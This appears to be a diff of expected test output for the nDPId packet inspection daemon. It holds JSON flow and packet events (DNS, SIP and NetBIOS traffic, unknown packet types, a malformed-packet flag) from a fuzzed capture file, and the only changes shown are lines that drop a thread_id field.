00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469877188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1120469877188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469877188,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOajAAAIARTB3AqAECwKgB\/wCJAKkAOluZhQIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNB10FDQUJNAAAgAAE="} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1120469877188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469877188,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOajAAAIARTB3AqAECwKgB\/wCJAKkAOluZhQIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNB10FDQUJNAAAgAAE="}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469877188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469877188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
@@ -269,8 +269,8 @@
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1120469922894,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469922894,"pkt":"ADBUADRWAODtAW69CABFAABIJXMAAIARTRvAqAECwKgBAQp8ADUANK14fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJRHliZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1120469922894,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469922894,"pkt":"ADBUADRWAODtAW69CABFAABIJXMAAIARTRvAqAECwKgBAQp8ADUANK14fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJRHliZXJjaXR5AmRrAAAhAAE="}
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.dybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.dybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00430{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469923705,"pkt":"\/\/\/\/\/\/\/\/AODtAW69qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469923705,"pkt":"\/\/\/\/\/\/\/\/AODtAW69qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469924456} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469924456}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1120469924897,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469924897,"pkt":"ADBUADRWAODtAW69CABFAABIajoAAIARTRfAqAECwKgBEQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1120469924897,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469924897,"pkt":"ADBUADRWAODtAW69CABFAABIajoAAIARTRfAqAECwKgBEQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -308,8 +308,8 @@
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1120469957944,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469957944,"pkt":"ADBUADRWAODtAW69CABFAABIakkAAIARTQjAqAECwKgBAQq0ADUANP0xLN82AAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1120469957944,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469957944,"pkt":"ADBUADRWAODtAW69CABFAABIakkAAIARTQjAqAECwKgBAQq0ADUANP0xLN82AAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956945,"flow_last_seen":1120469957944,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469957944,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469956945,"flow_last_seen":1120469957944,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469957944,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1120469959947,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CABFAABIakoAAIARTQfAqAECwKgBAQq0ADUANP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1120469959947,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CABFAABIakoAAIARTQfAqAECwKgBAQq0ADUANP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2151,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CGdFAABIaksAAIARTQbAqAECwKgBAQq0ADUAPP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2151,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469959947,"pkt":"ADBUADRWAODtAW69CGdFAABIaksAAIARTQbAqAECwKgBAQq0ADUAPP0xLN8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2151,"global_ts_msec":1120469961950} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":186,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2151,"global_ts_msec":1120469961950}
00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469572981,"flow_last_seen":1120469956406,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6064,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120469572981,"flow_last_seen":1120469956406,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6064,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1120469965955,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469970215,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469970215,"flow_last_seen":1120469970215,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469970215,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":8329,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -329,8 +329,8 @@
00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469985981,"flow_last_seen":1120469988978,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469988978,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":35,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469985981,"flow_last_seen":1120469988978,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469988978,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":35,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1120469990981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469990981,"pkt":"ADBUADRWAOLtAW69CABFAABIalYAAIARTPvAqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1120469990981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469990981,"pkt":"ADBUADRWAOLtAW69CABFAABIalYAAIARTPvAqAECwKgBAQq2ADUANHZOs8ABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469985981,"flow_last_seen":1120469990981,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469990981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":197,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469985981,"flow_last_seen":1120469990981,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469990981,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
